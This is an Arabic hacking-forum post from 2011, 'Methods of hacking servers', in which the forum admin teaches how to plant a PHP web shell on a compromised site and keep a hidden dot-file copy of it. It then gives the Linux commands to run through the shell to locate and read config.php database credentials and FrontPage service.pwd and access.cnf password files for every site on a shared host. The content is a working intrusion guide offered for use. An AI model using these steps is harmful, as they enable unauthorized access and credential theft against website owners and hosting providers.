MAFIA
مرحبا بك ايها الزائر اذا كنت مشترك فتفضل بالدخول و اذا لم تكن مشترك فتفضل بالتسجيل
نتمنى لكم قضاء أحلى الأوقات في المنتدى
MAFIA
مرحبا بك ايها الزائر اذا كنت مشترك فتفضل بالدخول و اذا لم تكن مشترك فتفضل بالتسجيل
نتمنى لكم قضاء أحلى الأوقات في المنتدى
MAFIA
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.
MAFIA


 
الرئيسيةالرئيسية  العاب اون لاينالعاب اون لاين  أحدث الصورأحدث الصور  التسجيلالتسجيل  دخول  
نتمنى لكم قضاء أحلى الأوقات في المنتدى
  

MAFIA :: عالم الهكرز
 

  طرق اختراق السيرفرات

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin
Admin
Admin


عدد المساهمات : 1192
تاريخ التسجيل : 19/08/2010
الموقع : www.mafia2030.c.la

طرق اختراق السيرفرات Empty
مُساهمةموضوع: طرق اختراق السيرفرات     طرق اختراق السيرفرات Emptyالإثنين يوليو 18, 2011 10:08 pm



بسم الله نبدأ في الشرح ::--




البي اتش بي شيل ((phpshell )) هو سكربت بلغة (( php ))




وتستطيع من خلاله تنفيذ اوامر اللينكس.. مثلا احضار باسوردات الـ مواقع التي على السيرفر وايضا قرائة الملف الــ config



للتي على السيرفر..




ولاكن لتنفيذ الاوامر هذه يجب عليك ان تقوم بتحميل الــ phpshell



على موقعك او الموقع الذي اخترقته..




ومن بعد التحميل سوف تستطيع ان تخترق السيرفر كاملا ..




وللتوضيح اكثر..




نفترض انك اخترقت الموقع لا يمكنك روئية الرابط الا بعد الرد على الموضوع وقمت بتحميل الــ phpshell



على ملف download



فسيصبح العنوان لا يمكنك روئية الرابط الا بعد الرد على الموضوع




وثم اذا دخلنا الى العنوان سوف نجد كلمة اسمها Command وامامها فراغ




في الفراغ هذا سوف نضع فيه اوامر اللينكس..




ولاكن قبل البدء في الشرح الجدي.. احب اوضح نقطه مهمه ::--




يمكن لو شاف صاحب الموقع الشيل.. يروح ويحذفه لك وثم تتورط..




ولاكن لو نسوي اثنين واحد منهم مخفي.. يعني الاول اذا حذفه راح يكون معانا واحد مخفي



لاخفاءه نسوي كذا بالطريقة هذي لا يمكنك روئية الرابط الا بعد الرد على الموضوع wget



وثم نقوم باخفائه.. نقوم بتغيير اسمه الى Mv phpshell.php .phpshell.php



ماذا تلاحظ ؟ لقط اضفنا نقطة . واذا حذف الاول راح يكون معانا ثاني ومخفي بعد..




---------------------------------------------



ندخل الى موضوعنا




والان بعد تحميل الشيل على الموقع



يصبح العنوان مثلا لا يمكنك روئية الرابط الا بعد الرد على الموضوع




وثم نجد كتابة اسمها Command وامامها فراغ




في الفراغ هذا ندخل اوامر اللينكس عليه..




وندخل الامر هذا مثلا ls /var/named



وهو لاحضار جميع المواقع التي على السيرفر..




ولاكن قبل البدء بالاوامر.. قد تستطيع ان تخترق السيرفر كاملا اذا لم يكن عليه الــ سيف مود



((safe mode))



=============---==-- شرح الاوامر --==--==============



الان سوف اعلمك طريقة سحب : قواعد البيانات - المواقع - الباسوردات




نبدأ من الاسهل حتى الاصعب.. (( كلها سهله لاكن بالباسوردات ))




1- قواعد البيانات



اكتب هذا الامر امام النص Command في الفراغ المقابل له




اكتب هذا الامر



find / -name config.php



الحين راح يطلع لك كل ملفات الكونفيج الي على السيرفر بالشكل هذا :



usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/forum/config.php



usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/blacktalons/admin/config.php



usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php



usr/local/plesk/apache/vhosts/aipep.com/httpdocs/bbs/config.php



(( المواقع التي على السيرفر قليله جدا جدا وعدد المواقع يكون على حسب عدد المواقع التي على السيرفر.. وانا عادة يخرج لي 300 موقع ))



ونلاحظ ان التي باللون الزهري هي الموقع..




طيب نبي نقرأ الي متكوب داخل الملف هذا



usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php



ونلاحظ ان الموقع هو لا يمكنك روئية الرابط الا بعد الرد على الموضوع والمنتدى من نوعية phpBB




المهم نبي نقرأ الي بداخله.. نكتب الامر هذا



cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/phpBB/config.php




وثم راح يطلع لك ملف الــ config.php



وبداخله يوجد اليوزر نيم والباسورد لقاعدة البيانات




روح طير للمنتدي وثم لملف الــ admin ودخل اليوزر نيم والباسورد لقاعدة البيانات



او الدخول له عبر برنامج الــ MySQL-Front_2.5_Setup




-------------------------------------------------------



الان انتهينا من قاعدة البيانات باقي باسوردات المواقع..




اكتب امام Command في الفراغ نكتب هذا الامر



find / -name service.pwd




وراح يطلع لنا المواقع بالشكل ذا :



usr/local/plesk/apache/vhosts/acinovara.com/httpdocs/_vti_pvt/service.pwd



usr/local/plesk/apache/vhosts/adamparker.com/httpdocs/_vti_pvt/service.pwd



usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd



usr/local/plesk/apache/vhosts/aipep.com/httpdocs/_vti_pvt/service.pwd



التي باللون الزهري هي المواقع...



طيب الان ابي استعرض الباسورد للموقع



usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd



راح نكتب الامر هذا




cat /usr/local/plesk/apache/vhosts/ainvar.net/httpdocs/_vti_pvt/service.pwd




وراح يجينا الباسورد للموقع ومشفر بمقياس DES




----------------------------------------------------------



طيب يوجد طريقة اخرى افضل من ذلك




نكتب الامر هذا



cat /home/*/public_html/_vti_pvt/service.pwd



او



cat /home/*/public_html/_vti_pvt/access.cnf




وراح يجينا الباسوردات لكل المواقع..




ويوجد اوامر اخرى كثيره للينكس.. ابحث عنها في المنتديات الاخرى وسوف تجدها ..



او قول لي وانا اعطيك افضلها واغلبها..
الرجوع الى أعلى الصفحة اذهب الى الأسفل
http://mafia2030.c.la
 
طرق اختراق السيرفرات
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
»  اختراق السيرفرات الخاصه dedicated (تجميع) ----
»  من يقول اختراق الاميل مستحيل ونهايه اختراق الاميل معي غصب تخترق اميل
»  اختراق الفيس بوك واختراق البوكر
»  مصطلحات مهمة للمبتدئين في اختراق المواقع
»  :: اختراق المواقع للمبتدئين ::

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
MAFIA :: عالم الهكرز-
انتقل الى: